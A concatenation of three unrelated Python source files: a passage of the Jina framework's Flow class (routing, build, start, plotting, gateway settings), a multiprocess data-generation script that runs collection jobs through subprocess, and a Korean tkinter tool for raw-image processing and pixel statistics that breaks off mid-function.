end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = {
ep
if pod.role.is_inspect
else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
}
else:
pod.needs = {reverse_inspect_map.get(ep, ep) for ep in pod.needs}
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{_s_role} {line_st} {node_print}:::{_e_role};'
)
mermaid_graph.append(f'classDef {PodRoleType.INSPECT} stroke:#F29C9F')
mermaid_graph.append(f'classDef {PodRoleType.JOIN_INSPECT} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {PodRoleType.GATEWAY} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {PodRoleType.INSPECT_AUX_PASS} stroke-dasharray: 2 2'
)
mermaid_graph.append('classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append('\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
(
'\t🏠 Local access:\t'
+ colored(
f'{self.host}:{self.port_expose}',
'cyan',
attrs='underline',
)
),
(
'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
)
),
]
)
if self.address_public:
address_table.append(('\t🌐 Public address:\t' + colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)))
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(('\t💬 Swagger UI:\t\t' + colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)))
address_table.append(('\t📚 Redoc:\t\t' + colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)))
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** This function was only accepting dump_path as the only potential arg to override
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
datagen.py
|
"""
Batch-generate data
"""
import os
import numpy as np
import multiprocessing as mp
from subprocess import call
from utils import printout
import time
class DataGen(object):
def __init__(self, num_processes, flog=None):
self.num_processes = num_processes
self.flog = flog
self.todos = []
self.processes = []
self.is_running = False
self.Q = mp.Queue()
def __len__(self):
return len(self.todos)
def add_one_collect_job(self, data_dir, shape_id, category, cnt_id, primact_type, trial_id):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('COLLECT', shape_id, category, cnt_id, primact_type, data_dir, trial_id, np.random.randint(10000000))
self.todos.append(todo)
def add_one_recollect_job(self, src_data_dir, dir1, dir2, recollect_record_name, tar_data_dir, x, y):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('RECOLLECT', src_data_dir, recollect_record_name, tar_data_dir, np.random.randint(10000000), x, y, dir1, dir2)
self.todos.append(todo)
def add_one_checkcollect_job(self, src_data_dir, dir1, dir2, recollect_record_name, tar_data_dir, x, y):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('CHECKCOLLECT', src_data_dir, recollect_record_name, tar_data_dir, np.random.randint(10000000), x, y, dir1, dir2)
self.todos.append(todo)
@staticmethod
def job_func(pid, todos, Q):
succ_todos = []
for todo in todos:
if todo[0] == 'COLLECT':
# cmd = 'python collect_data.py %s %s %d %s --out_dir %s --trial_id %d --random_seed %d --no_gui > /dev/null 2>&1' \
# % (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7])
cmd = 'CUDA_VISIBLE_DEVICES=1 python collect_data.py %s %s %d %s --out_dir %s --trial_id %d --random_seed %d --no_gui' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7])
folder_name = todo[5]
job_name = '%s_%s_%d_%s_%s' % (todo[1], todo[2], todo[3], todo[4], todo[6])
elif todo[0] == 'RECOLLECT':
cmd = 'python recollect_data.py %s %s %s --random_seed %d --no_gui --x %d --y %d --dir1 %s --dir2 %s > /dev/null 2>&1' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7], todo[8])
folder_name = todo[3]
job_name = todo[2]
elif todo[0] == 'CHECKCOLLECT':
cmd = 'python checkcollect_data.py %s %s %s --random_seed %d --no_gui --x %d --y %d --dir1 %s --dir2 %s > /dev/null 2>&1' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7], todo[8])
folder_name = todo[3]
job_name = todo[2]
ret = call(cmd, shell=True)
if ret == 0:
succ_todos.append(os.path.join(folder_name, job_name))
if ret == 2:
succ_todos.append(None)
Q.put(succ_todos)
def start_all(self):
if self.is_running:
printout(self.flog, 'ERROR: cannot start all while DataGen is running!')
exit(1)
total_todos = len(self)
num_todos_per_process = int(np.ceil(total_todos / self.num_processes))
np.random.shuffle(self.todos)
for i in range(self.num_processes):
todos = self.todos[i*num_todos_per_process: min(total_todos, (i+1)*num_todos_per_process)]
p = mp.Process(target=self.job_func, args=(i, todos, self.Q))
p.start()
self.processes.append(p)
self.is_running = True
def join_all(self):
if not self.is_running:
printout(self.flog, 'ERROR: cannot join all while DataGen is idle!')
exit(1)
ret = []
for p in self.processes:
ret += self.Q.get()
for p in self.processes:
p.join()
self.todos = []
self.processes = []
self.Q = mp.Queue()
self.is_running=False
return ret
|
Project3 Image Processing Raw.py
|
#Project
## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import operator
import threading
import random
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # 영상이 128미만이면
VIEW_X = outW
VIEW_Y = outH
step = 1 # 건너뛸숫자
else :
step = outW / VIEW_X # step을 실수도 인정. 128, 256, 512 단위가 아닌 것 고려.
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
# 화면에 출력. 실수 step을 위해서 numpy 사용
import numpy
def putPixel() :
for i in numpy.arange(0, outH,step) :
for k in numpy.arange(0, outW,step) :
i = int(i); k = int(k) # 첨자이므로 정수화
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
#[화소점처리 알고리즘]
def addImage(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW
outH = inH
outImage = []
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
if num == 1: #밝게하기(덧셈)
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 : # 덧셈
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
elif num == 2: #어둡게하기(뺄셈)
value = askinteger('어둡게하기', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] - value < 0: # 뺄셈
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] - value
elif num == 3: #밝게하기(곱셈)=뚜렷하게
value = askinteger('밝게하기(뚜렷하게)', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] * value > 255: # 곱셈
outImage[i][k] = 255
else:
outImage[i][k] = inImage[i][k] * value
elif num == 4: #어둡게하기(나눗셈)=희미하게
value = askinteger('어둡게하기(희미하게)', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] // value > 255: # 나눗셈 : {조심} 몫만 출력 if not 에러.
outImage[i][k] = 255
elif inImage[i][k] // value < 0:
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] // value
display()
#[데이터분석]
def analyzeData(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
if num == 1 : # 입출력 영상의 평균값
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('400x400')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg))
label2.pack()
elif num == 2 : #입출력 시 최대값, 최소값
inDict, outDict = {}, {}
for i in range(inH): #{중요}{다시보기}
for k in range(inW):
if inImage[i][k] in inDict:
inDict[inImage[i][k]] += 1
else:
inDict[inImage[i][k]] = 1
if outImage[i][k] in outDict:
outDict[outImage[i][k]] += 1
else:
outDict[outImage[i][k]] = 1
insortList = sorted(inDict.items(), key=operator.itemgetter(1))
outsortList = sorted(outDict.items(), key=operator.itemgetter(1))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('400x400')
label1 = Label(subWindow, text="입력 시 최대값, 최소값 : " + str(insortList[-1]) + str(insortList[0]))
label1.pack()
label2 = Label(subWindow, text="출력 시 최대값, 최소값 : " + str(outsortList[-1]) + str(outsortList[0]))
label2.pack()
subWindow.mainloop()
def a_histogram() : # 히스토그램
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256; normalList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
